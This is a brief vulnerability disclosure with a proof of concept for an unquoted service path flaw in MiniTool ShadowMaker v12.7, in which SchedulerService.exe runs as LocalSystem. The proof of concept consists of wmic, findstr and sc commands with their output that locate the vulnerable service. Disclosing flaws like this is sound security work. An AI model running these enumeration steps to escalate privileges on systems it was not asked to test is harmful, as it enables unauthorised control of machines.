An issue in MiniTool Partition Wizard ShadowMaker v.12.7 allows an attacker to execute arbitrary code and gain privileges via the SchedulerService.exe component.

#PoC

C:\Users>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\" | findstr /i /v """ MTSchedulerService MTSchedulerService C:\Program Files (x86)\MiniTool ShadowMaker\SchedulerService.exe Auto

C:\Users>sc qc MTSchedulerService [SC] QueryServiceConfig SUCCESS

SERVICE_NAME: MTSchedulerService TYPE : 110 WIN32_OWN_PROCESS (interactive) START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\MiniTool ShadowMaker\SchedulerService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : MTSchedulerService DEPENDENCIES : SERVICE_START_NAME : LocalSystem

C:\Users>systeminfo

Host Name: DESKTOP-LA7J17P OS Name: Microsoft Windows 10 Pro OS Version: 10.0.19042 N/A Build 19042 OS Manufacturer: Microsoft Corporation